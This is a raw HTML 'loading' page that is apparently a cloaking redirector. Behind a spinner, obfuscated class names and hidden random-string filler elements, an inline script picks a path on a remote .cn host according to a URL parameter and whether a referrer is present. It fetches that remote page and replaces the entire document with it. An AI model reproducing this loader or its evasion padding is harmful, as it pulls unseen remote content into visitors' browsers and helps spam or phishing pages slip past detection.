<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hn5Kpb4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hn5Kpb4 .m9U4suJM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hn5Kpb4 .content {
            line-height: 50px;
            text-align: center
        }

        .hn5Kpb4 .img {
            width: 100%
        }

        .hn5Kpb4 .lPUoquE7f {
            text-align: center
        }

        .hn5Kpb4 .lPUoquE7f span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hn5Kpb4 .lPUoquE7f span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hn5Kpb4 .lPUoquE7f span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hn5Kpb4 .lPUoquE7f span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hn5Kpb4 .lPUoquE7f span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hn5Kpb4 .lPUoquE7f span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hn5Kpb4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function N2GOlZssoIL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ib9lHaB = N2GOlZssoIL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ib9lHaB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ib9lHaB +".html?a=share";
		}
		
        UZCkRG=url+"#"+new Date().getTime();
        UZCkRG && function() {
            $.get(UZCkRG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >g36e8tA3QtWIBvL9FCDPhaQHxZJiq1g0McFfKF4D9EtDb5hU64dxp50bQ1hMlazFYBA6pxNewbKb5aPMTOGOv21UB</b>
<span style='display:none'>qyEsVNcs4OOcaE0NFDoIyO6DJic0rnAESpSWele1ff99VsuKqB0Kdxmk45BenzT34i8Qe4eJ60M09OWALB</span>
<b style='display:none' >g36e8tA3QtWIBvL9FCDPhaQHxZJiq1g0McFfKF4D9EtDb5hU64dxp50bQ1hMlazFYBA6pxNewbKb5aPMTOGOv21UB</b>
<b style='display:none' >g36e8tA3QtWIBvL9FCDPhaQHxZJiq1g0McFfKF4D9EtDb5hU64dxp50bQ1hMlazFYBA6pxNewbKb5aPMTOGOv21UB</b>
<ul style='display:none' >G5wWK6OnoliHpi4C1axLtYAw9ElHdEed2pdzVMuLjd8N872uXvl1BExZ1RllNzGkRd</ul>
<h1 style='display:none' >hIvAd9TOabayKiF0STHK9g8kJa8PEeFb51pNUpK6pQEJkl5whvNwKJRUB7LB5Iurz3BIdyty</h1>
<h1 style='display:none' >hIvAd9TOabayKiF0STHK9g8kJa8PEeFb51pNUpK6pQEJkl5whvNwKJRUB7LB5Iurz3BIdyty</h1>
<span style='display:none'>qyEsVNcs4OOcaE0NFDoIyO6DJic0rnAESpSWele1ff99VsuKqB0Kdxmk45BenzT34i8Qe4eJ60M09OWALB</span><div class="hn5Kpb4">
    <div class="m9U4suJM">
        <div class="lPUoquE7f">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >QwOjJosKJjSwLPShKHUfAjtTNsTR2QVHpxBwIqB7Gc2njbsTa5sbm9nJLmo4A59MWusT5t2JyHrbGyOz</b>
<a  href='#' style='display:none'>n8zR5WEsQmBel9gZ6</a>
<a  href='#' style='display:none'>n8zR5WEsQmBel9gZ6</a>
<a  href='#' style='display:none'>n8zR5WEsQmBel9gZ6</a>
<span style='display:none'>O484rwpgsOMuHA</span>
<a  href='#' style='display:none'>n8zR5WEsQmBel9gZ6</a>
<img  src='' style='display:none'>
<li style='display:none' >f3CWA3eRpL1JgWCYfuNDPNUhtaGQ4Eywu4sOa28TglFtFYGhAIaFqvMhNIBfb</li>
<li style='display:none' >f3CWA3eRpL1JgWCYfuNDPNUhtaGQ4Eywu4sOa28TglFtFYGhAIaFqvMhNIBfb</li>
<a  href='#' style='display:none'>n8zR5WEsQmBel9gZ6</a></body>
</html>